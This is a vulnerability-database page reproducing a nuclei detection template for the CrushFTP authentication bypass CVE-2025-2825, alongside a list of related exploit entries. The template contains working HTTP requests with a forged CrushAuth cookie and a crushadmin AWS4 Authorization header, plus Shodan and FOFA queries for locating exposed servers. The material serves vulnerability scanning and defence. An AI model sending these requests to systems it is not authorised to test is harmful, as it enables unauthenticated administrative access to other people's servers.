Lucene search
K

CrushFTP - Authentication Bypass

🗓️ 28 Mar 2025 10:17:56Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 114 Views

CrushFTP versions 10.0.0-11.3.0 have critical authentication bypass vulnerability allowing unauthorized access.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-2825
22 Jul 202510:40
githubexploit
GithubExploit
Exploit for Server-Side Request Forgery in Microsoft
9 Jun 202506:46
githubexploit
GithubExploit
Exploit for CVE-2025-29927
28 Apr 202511:14
githubexploit
GithubExploit
Exploit for CVE-2025-29927
24 Mar 202513:27
githubexploit
GithubExploit
Exploit for CVE-2025-29927
25 Apr 202508:51
githubexploit
GithubExploit
Exploit for CVE-2025-29927
27 Mar 202511:48
githubexploit
GithubExploit
Exploit for CVE-2025-29927
23 Mar 202519:41
githubexploit
GithubExploit
Exploit for CVE-2025-29927
25 Mar 202510:30
githubexploit
GithubExploit
Exploit for CVE-2025-29927
23 Mar 202521:42
githubexploit
GithubExploit
Exploit for CVE-2025-29927
28 Aug 202506:55
githubexploit
Rows per page
id: CVE-2025-2825

info:
  name: CrushFTP - Authentication Bypass
  author: parthmalhotra,Ice3man,DhiyaneshDk,pdresearch
  severity: critical
  description: |
    CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability that may result in unauthenticated access. Remote and unauthenticated HTTP requests to CrushFTP may allow attackers to gain unauthorized access.
  reference:
    - https://projectdiscovery.io/blog/crushftp-authentication-bypass/
    - https://www.rapid7.com/blog/post/2025/03/25/etr-notable-vulnerabilities-in-next-js-cve-2025-29927/
    - https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2825
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-2825
    cwe-id: CWE-287
    epss-score: 0.00039
    epss-percentile: 0.08378
  metadata:
    max-request: 2
    vendor: crushftp
    product: crushftp
    shodan-query:
      - http.title:"CrushFTP WebInterface"
      - http.favicon.hash:-1022206565
      - http.html:"crushftp"
    fofa-query:
      - icon_hash="-1022206565"
      - title="CrushFTP WebInterface"
      - body="crushftp"
  tags: cve,cve2025,crushftp,unauth,auth-bypass,rce

variables:
  string_1: "{{rand_text_numeric(13)}}"
  string_2: "{{rand_text_alpha(28)}}"
  string_3: "{{rand_text_numeric(4)}}"

http:
  - raw:
      - |
        GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f={{string_3}} HTTP/1.1
        Cookie: CrushAuth={{string_1}}_{{string_2}}{{string_3}}; currentAuth={{string_3}}
        Host: {{Hostname}}
        Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

      - |
        GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f={{string_3}} HTTP/1.1
        Cookie: CrushAuth={{string_1}}_{{string_2}}{{string_3}}; currentAuth={{string_3}}
        Host: {{Hostname}}
        Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<user_list_subitem>crushadmin</user_list_subitem>"

      - type: word
        part: content_type
        words:
          - "text/xml"

      - type: status
        status:
          - 200
# digest: 490a00463044022040fadb7bb072c6017cafa22449f56440b96a00a47ddff237bf5bce5a9e083b5902203c677e83121fb11ab6bfe13ba1cefd07aada521c864d14c7bfd59923ef3dc638:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Mar 2025 10:36Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.1 - 9.8
EPSS0.99621
SSVC
114